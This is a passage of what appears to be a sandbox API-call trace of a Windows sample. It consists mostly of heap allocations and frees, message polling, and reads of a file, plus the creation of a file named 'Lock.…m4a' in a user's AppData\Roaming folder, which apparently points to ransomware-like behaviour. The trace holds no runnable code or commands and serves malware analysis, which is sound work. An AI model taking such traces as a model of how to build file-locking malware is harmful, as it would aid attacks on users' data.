RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0206.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.656] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0206.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34c2258 [0206.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.UEbu8HvUsrKZg-ZGj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.uebu8hvusrkzg-zgj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0206.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0206.661] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0206.661] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0xf2fd, lpOverlapped=0x0) returned 1 [0206.664] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0206.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf2fd) returned 0x24b7a48 [0206.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0206.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0206.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0206.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf2fd) returned 0x24c6d50 [0206.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0206.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf2fd) returned 0x24b7a48 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0206.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.669] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0206.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf2fd) returned 0x24b7a48 [0206.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0206.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf2fd) returned 0x24d6058 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.674] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.676] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 